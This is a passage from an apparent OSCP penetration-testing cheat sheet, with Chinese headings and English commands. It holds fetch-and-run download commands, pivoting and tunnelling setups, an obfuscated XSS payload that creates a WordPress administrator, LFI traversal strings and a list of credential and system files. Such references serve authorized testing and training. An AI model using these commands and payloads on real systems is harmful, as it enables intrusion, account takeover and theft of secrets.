Anarchy | https://github.com/urbanadventurer/username-anarchy | ### 报告 | 名称 | URL | | --- | --- | | OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault | | SysReptor | https://github.com/Syslifters/sysreptor | | SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting | | SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ | ### 社交媒体资源 | 名称 | URL | | --- | --- | | OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE&list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x | | Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ | | HackTricks | https://book.hacktricks.xyz/ | | HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation | | Hacking Articles | https://www.hackingarticles.in/ | | Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ | | OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP | | OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 | | IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA | | IppSec.rocks | https://ippsec.rocks/?# | | 0xdf | https://0xdf.gitlab.io/ | ## 命令 ### 基础 #### curl ``` curl -v http:// // verbose output curl -X POST http:// // use POST method curl -X PUT http:// // use PUT method curl --path-as-is http:///../../../../../../etc/passwd // use --path-as-is to handle /../ or /./ in the given URL curl --proxy http://127.0.0.1:8080 // use proxy curl -F myFile=@ http:// // file upload curl${IFS}/ // Internal Field Separator (IFS) example ``` #### 文件传输 ##### Certutil ``` certutil -urlcache -split -f "http:///" ``` ##### Netcat ``` nc -lnvp > nc < ``` ##### Impacket ``` sudo impacket-smbserver ./ sudo impacket-smbserver . -smb2support copy * \\\ ``` ##### PowerShell ``` iwr / -o IEX(IWR http:///) -UseBasicParsing powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\ ``` ##### Bash only ###### wget 版本 直接粘贴到 shell 中。 ``` function __wget() { : ${DEBUG:=0} local URL=$1 local tag="Connection: close" local mark=0 if [ -z "${URL}" ]; then printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \ "${FUNCNAME[0]}" "${FUNCNAME[0]}" return 1; fi read proto server path <<<$(echo ${URL//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST" [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT" [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC" exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3 while read line; do [[ $mark -eq 1 ]] && echo $line if [[ "${line}" =~ "${tag}" ]]; then mark=1 fi done <&3 exec 3>&- } ``` ``` __wget http:/// ``` ###### curl 版本 ``` function __curl() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } ``` ``` __curl http:/// > ``` #### FTP ``` ftp ftp -A wget -r ftp://anonymous:anonymous@ ``` #### Kerberos ``` sudo apt-get install krb5-kdc ``` ##### Ticket 处理 ``` impacket-getTGT /:'' export KRB5CCNAME=.ccache export KRB5CCNAME='realpath .ccache' KRB5CCNAME=.ccache ``` ##### Kerberos 相关文件 ``` /etc/krb5.conf // kerberos configuration file location kinit // creating ticket request klist // show available kerberos tickets kdestroy // delete cached kerberos tickets .k5login // resides kerberos principals for login (place in home directory) krb5.keytab // "key table" file for one or more principals kadmin // kerberos administration console add_principal // add a new user to a keytab file ksu // executes a command with kerberos authentication klist -k /etc/krb5.keytab // lists keytab file kadmin -p kadmin/ -k -t /etc/krb5.keytab // enables editing of the keytab file ``` ##### 票据转换 ###### kribi 转 ccache ``` base64 -d .kirbi.b64 > .kirbi impacket-ticketConverter .kirbi .ccache export KRB5CCNAME=`realpath .ccache` ``` ###### ccache 转 kirbi ``` impacket-ticketConverter .ccache .kirbi base64 -w0 .kirbi > .kirbi.base64 ``` #### Ligolo-ng ##### 下载代理和代理程序 ##### 准备隧道接口 ``` sudo ip tuntap add user $(whoami) mode tun ligolo ``` ``` sudo ip link set ligolo up ``` ##### 在攻击者机器上设置代理 ``` ./proxy -laddr :443 -selfcert ``` ##### 在目标机器上设置代理程序 ``` ./agent -connect :443 -ignore-cert ``` ##### 配置会话 ``` ligolo-ng » session ``` ``` [Agent : user@target] » ifconfig ``` ``` sudo ip r add 172.16.1.0/24 dev ligolo ``` 或者 ``` sudo ip route add 240.0.0.1/32 dev ligolo ``` ``` [Agent : user@target] » start ``` ##### 端口转发 ``` [Agent : user@target] » listener_add --addr : --to : --tcp ``` ##### 替代会话配置 ###### 在攻击者机器上设置代理 ``` sudo ./proxy -selfcert ``` ###### 准备隧道接口 ``` ligolo-ng » ifcreate --name ligolo ``` ###### 添加路由到隧道接口 ``` ligolo-ng » route_add --name ligolo --route ``` ##### 在目标机器上设置代理程序 ``` Start-Process -FilePath ".\agent.exe" -ArgumentList "-connect :11601 -ignore-cert" -WindowStyle Hidden ``` #### Linux ##### CentOS ``` doas -u /bin/sh ``` ##### 环境变量 ``` export PATH=`pwd`:$PATH ``` ##### gcc ``` gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit i686-w64-mingw32-gcc -o main32.exe main.c x86_64-w64-mingw32-gcc -o main64.exe main.c ``` ##### getfacl ``` getfacl ``` ##### iconv ``` echo "" | iconv -t UTF-16LE | base64 -w 0 echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 iconv -f ASCII -t UTF-16LE .txt | base64 | tr -d "\n" ``` ##### vi ``` :w !sudo tee % # save file with elevated privileges without exiting ``` ##### Windows 命令格式化 ``` echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 ``` #### Microsoft Windows ##### dir ``` dir /a dir /a:d dir /a:h dir flag* /s /p dir /s /b *.log ``` #### NFS ``` sudo mount -t nfs -o vers=4,nolock :/ /PATH/TO/FOLDER/ ``` #### PHP Webserver ``` sudo php -S 127.0.0.1:80 ``` #### Ping ``` ping -c 1 ping -n 1 ``` #### 端口转发 ##### Chisel | 系统 | IP 地址 | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | ###### 反向 Pivot - LHOST < APPLICATION SERVER ###### LHOST ``` ./chisel server -p 9002 -reverse -v ``` ###### APPLICATION SERVER ``` ./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000 ``` ###### SOCKS5 / Proxychains 配置 - LHOST > APPLICATION SERVER > NETWORK ###### LHOST ``` ./chisel server -p 9002 -reverse -v ``` ###### APPLICATION SERVER ``` ./chisel client 192.168.50.10:9002 R:socks ``` ##### Ligolo-ng | 系统 | IP 地址 | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > NETWORK ###### 下载代理和代理程序 ``` wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz ``` ###### 准备隧道接口 ``` sudo ip tuntap add user $(whoami) mode tun ligolo ``` ``` sudo ip link set ligolo up ``` ###### 在 LHOST 上设置代理 ``` ./proxy -laddr 192.168.50.10:443 -selfcert ``` ###### 在 APPLICATION SERVER 上设置代理程序 ``` ./agent -connect 192.168.50.10:443 -ignore-cert ``` ###### 配置会话 ``` ligolo-ng » session ``` ``` [Agent : user@target] » ifconfig ``` ``` sudo ip r add 172.16.50.0/24 dev ligolo ``` ``` [Agent : user@target] » start ``` ###### 端口转发 - LHOST < APPLICATION SERVER > DATABASE SERVER ``` [Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp ``` ##### Socat | 系统 | IP 地址 | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER ###### APPLICATION SERVER ``` ip a ip r socat -ddd TCP-LISTEN:2345,fork TCP::5432 ``` ###### LHOST ``` psql -h -p 2342 -U postgres ``` ##### SSH 隧道 ###### 本地端口转发 | 系统 | IP 地址 | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### APPLICATION SERVER ``` python3 -c 'import pty;pty.spawn("/bin/bash")' ssh @192.168.100.10 ip a ip r for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; ssh -N -L 0.0.0.0:4455:172.16.50.10:445 @10.10.100.20 ``` ###### LHOST ``` smbclient -p 4455 //172.16.50.10/ -U --password= ``` ###### 动态端口转发 | 系统 | IP 地址 | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### APPLICATION SERVER ``` python3 -c 'import pty;pty.spawn("/bin/bash")' ssh -N -D 0.0.0.0:9999 @10.10.100.20 ``` ###### LHOST ``` sudo ss -tulpn tail /etc/proxychains4.conf socks5 192.168.50.10 9999 proxychains smbclient -p 4455 //172.16.50.10/ -U --password= ``` ###### 远程端口转发 | 系统 | IP 地址 | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST <-> FIREWALL <-> APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### LHOST ``` sudo systemctl start ssh sudo ss -tulpn ``` ###### APPLICATION SERVER ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 @192.168.50.10 ``` ###### LHOST ``` psql -h 127.0.0.1 -p 2345 -U postgres ``` ###### 远程动态端口转发 | 系统 | IP 地址 | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < APPLICATION SERVER > NETWORK ###### APPLICATION SERVER ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -R 9998 @192.168.50.10 ``` ###### LHOST ``` sudo ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20 ``` ##### sshuttle | 系统 | IP 地址 | | ------------------ | -------------- | | LHOST | 192168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > NETWORK ###### APPLICATION SERVER ``` socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22 ``` ###### LHOST ``` sshuttle -r @192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24 smbclient -L //172.16.50.10/ -U --password= ``` ##### ssh.exe | 系统 | IP 地址 | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > NETWORK ###### LHOST ``` sudo systemctl start ssh xfreerdp3 /u: /p: /v:192.168.100.20 ``` ###### WINDOWS JUMP SERVER ``` where ssh C:\Windows\System32\OpenSSH\ssh.exe C:\Windows\System32\OpenSSH> ssh -N -R 9998 @192.168.50.10 ``` ###### LHOST ``` ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains psql -h 10.10.100.20 -U postgres ``` ##### Plink | 系统 | IP 地址 | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER ###### LHOST ``` find / -name plink.exe 2>/dev/null /usr/share/windows-resources/binaries/plink.exe ``` ###### WINDOWS JUMP SERVER ``` plink.exe -ssh -l -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10 ``` ###### LHOST ``` ss -tulpn xfreerdp3 /u: /p: /v:127.0.0.1:9833 ``` ##### Netsh | 系统 | IP 地址 | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > DATABASE SERVER ###### LHOST ``` xfreerdp3 /u: /p: /v:192.168.100.20 ``` ###### WINDOWS JUMP SERVER ``` netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20 netstat -anp TCP | findstr "2222" netsh interface portproxy show all netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow ``` ###### LHOST ``` sudo nmap -sS 192.168.50.10 -Pn -n -p2222 ssh database_admin@192.168.50.10 -p2222 ``` ###### WINDOWS JUMP SERVER ``` netsh advfirewall firewall delete rule name="port_forward_ssh_2222" netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10 ``` #### Python Webserver ``` sudo python -m SimpleHTTPServer 80 sudo python3 -m http.server 80 ``` #### RDP ``` xfreerdp3 /v: /u: /p: /cert-ignore xfreerdp3 /v: /u: /p: /d: /cert-ignore xfreerdp3 /v: /u: /p: +dynamic-resolution +clipboard xfreerdp3 /v: /u: /d: /pth:'' +dynamic-resolution +clipboard xfreerdp3 /v: +dynamic-resolution +clipboard /tls:seclevel:0 /sec:nla:off rdesktop ``` #### showmount ``` /usr/sbin/showmount -e sudo showmount -e chown root:root sid-shell; chmod +s sid-shell ``` #### SMB ``` mount.cifs /// /mnt/remote guestmount --add '//' --inspector --ro /mnt/ -v ``` #### smbclient ``` smbclient -L \\\ -N smbclient -L /// -N smbclient -L ///// -N smbclient -L //// -U % smbclient -U "" -L \\\\\\ smbclient /// smbclient /// -U smbclient ///SYSVOL -U % smbclient "\\\\\" smbclient \\\\\\ -U '' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 smbclient --no-pass /// ``` ##### 一次下载多个文件 ``` mask"" recurse ON prompt OFF mget * ``` #### SSH ##### 使用过时的算法 ``` ssh user@ -oKexAlgorithms=+diffie-hellman-group1-sha1 ``` ##### 错误处理 ###### 修复 SSH 私钥 ``` dos2unix id_rsa vim --clean id_rsa chmod 600 id_rsa ``` ``` dos2unix id_rsa; vim --clean -c 'wq' id_rsa; chmod 600 id_rsa ``` #### 时间和日期 ##### 获取服务器时间 ``` sudo nmap -sU -p 123 --script ntp-info ``` ##### 停止 virtualbox-guest-utils 以停止同步时间 ``` sudo /etc/init.d/virtualbox-guest-utils stop ``` ##### 停止 systemd-timesyncd 以手动同步时间 ``` sudo systemctl stop systemd-timesyncd ``` ##### 禁用自动同步 ``` sudo systemctl disable --now chronyd ``` ##### 设置日期和时间的选项 ##### net time ``` sudo net time -c sudo net time set -S sudo net time \\ /set /y ``` ##### ntpdate ``` sudo ntpdate sudo ntpdate -s sudo ntpdate -b -u ``` ##### rdate ``` sudo rdate -n sudo rdate -s ``` ##### timedatectl ``` sudo timedatectl show sudo timedatectl set-ntp false sudo timedatectl set-timezone UTC sudo timedatectl list-timezones sudo timedatectl set-timezone '/' sudo timedatectl set-time 15:58:30 sudo timedatectl set-time '2015-11-20 16:14:50' sudo timedatectl set-local-rtc 1 ``` ##### 与服务器保持同步 ``` while [ 1 ]; do sudo ntpdate ;done ``` #### Tmux ``` ctrl b + w # show windows ctrl + " # split window horizontal ctrl + % # split window vertical ctrl + , # rename window ctrl + { # flip window ctrl + } # flip window ctrl + spacebar # switch pane layout ``` 复制 & 粘贴 ``` :setw -g mode-keys vi ctrl b + [ space enter ctrl b + ] ``` 搜索 ``` ctrl b + [ # enter copy ctrl + / # enter search while within copy mode for vi mode n # search next shift + n # reverse search ``` 日志记录 ``` ctrl b shift + P # start / stop ``` 保存输出 ``` ctrl b + : capture-pane -S - ctrl b + : save-buffer .txt ``` #### 升级 Shell ``` python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl + z stty raw -echo fg Enter Enter export XTERM=xterm ``` 或者 ``` Ctrl + z stty -a stty raw -echo;fg Enter Enter stty rows 37 cols 123 export TERM=xterm-256color bash ``` 或者: ``` script -q /dev/null -c bash /usr/bin/script -qc /bin/bash /dev/null ``` ##### 单行命令 ``` stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; ``` ##### 错误处理 ###### 修复楼梯效应 ``` env reset ``` 或者 ``` stty onlcr ``` #### uv ``` uv add --script ``` ##### XSS 客户端攻击 ###### 请求示例 ``` foobar! ``` ###### 获取 nonce ``` var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/user-new.php"; var nonceRegex = /ser" value="([^"]*?)"/g; ajaxRequest.open("GET", requestURL, false); ajaxRequest.send(); var nonceMatch = nonceRegex.exec(ajaxRequest.responseText); var nonce = nonceMatch[1]; ``` ###### 更新 Payload 脚本 ``` var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator"; ajaxRequest = new XMLHttpRequest(); ajaxRequest.open("POST", requestURL, true); ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); ajaxRequest.send(params); ``` ###### 压缩 Payload 脚本 ``` var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params); ``` ##### 编码函数 ``` function encode_to_javascript(string) { var input = string var output = ''; for(pos = 0; pos < input.length; pos++) { output += input.charCodeAt(pos); if(pos != (input.length - 1)) { output += ","; } } return output; } let encoded = encode_to_javascript('var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params);') console.log(encoded) ``` ###### 编码后的 Payload ``` 118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9 ``` ###### 执行 ``` curl -i http:// --user-agent "" --proxy 127.0.0.1:8080 ``` #### ffuf ##### 常用命令 ``` ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." -u http:/// -ac ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." -u http:/// -fs 185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http:///backups/backup_2020070416FUZZ.zip ``` ##### 使用请求文件 ``` ffuf -request -w /usr/share/wordlists/dirb/common.txt ``` ##### API Fuzzing ``` ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412 ``` ##### 搜索 LFI ``` ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http:///admin../admin_staging/index.php?page=FUZZ -fs 15349 ``` ##### 使用 PHP Session ID 进行 Fuzzing ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ``` ##### 递归 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/basic/FUZZ -recursion ``` ##### 文件扩展名 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log ``` ##### 速率限制 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429 ``` ##### 虚拟主机发现 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u http:// -ac ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u http:// -fs 1495 ``` ##### 大规模文件扩展名发现 ``` ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip ``` #### GitTools ``` ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/ ``` #### Gobuster ``` -e // extended mode that renders the full url -k // skip ssl certificate validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --wildcard // set wildcard option gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x php gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200 gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://:/ -b 200 -k --wildcard ``` ##### 常见文件扩展名 ``` txt,bak,php,html,js,asp,aspx ``` ##### 常见图片扩展名 ``` png,jpg,jpeg,gif,bmp ``` ##### POST 请求 ``` gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http:///api/ -e -s 200 ``` ##### DNS 侦察 ``` gobuster dns -d -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt gobuster dns -d -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt ``` ##### VHost 发现 ``` gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain ``` ##### 指定用户代理 ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux ``` #### 本地文件包含 (LFI) ``` http:///.php?file= http:///.php?file=../../../../../../../../etc/passwd http:////php?file=../../../../../../../../../../etc/passwd ``` ##### 直到 php 5.3 ``` http:////php?file=../../../../../../../../../../etc/passwd%00 ``` ##### 空字节 ``` %00 0x00 ``` ##### 编码的遍历字符串 ``` ../ ..\ ..\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\ ``` ##### php://filter 包装器 ``` url=php://filter/convert.base64-encode/resource=file:////var/www//api.php ``` ``` http:///index.php?page=php://filter/convert.base64-encode/resource=index http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd base64 -d .php ``` ##### Django, Rails 或 Node.js Web 应用标头值 ``` Accept: ../../../../.././../../../../etc/passwd{{ Accept: ../../../../.././../../../../etc/passwd{%0D Accept: ../../../../.././../../../../etc/passwd{%0A Accept: ../../../../.././../../../../etc/passwd{%00 Accept: ../../../../.././../../../../etc/passwd{%0D{{ Accept: ../../../../.././../../../../etc/passwd{%0A{{ Accept: ../../../../.././../../../../etc/passwd{%00{{ ``` ##### Linux 文件 ``` /app/etc/local.xml /etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow /etc/at.deny /etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny /etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts /etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini /etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf /etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release /etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf /etc/network/interfaces /etc/networks /etc/npasswd /etc/passwd /etc/php4.4/fcgi/php.ini /etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini /etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini /etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini /etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf /etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf /etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf /etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf /opt/xampp/etc/php.ini /proc/cmdline /proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules /proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps /proc/sched_debug 